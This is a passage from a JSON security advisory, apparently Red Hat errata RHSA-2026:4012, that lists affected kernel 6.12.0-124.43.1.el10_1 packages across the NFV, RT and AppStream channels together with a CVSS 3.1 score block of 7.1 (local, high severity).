"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
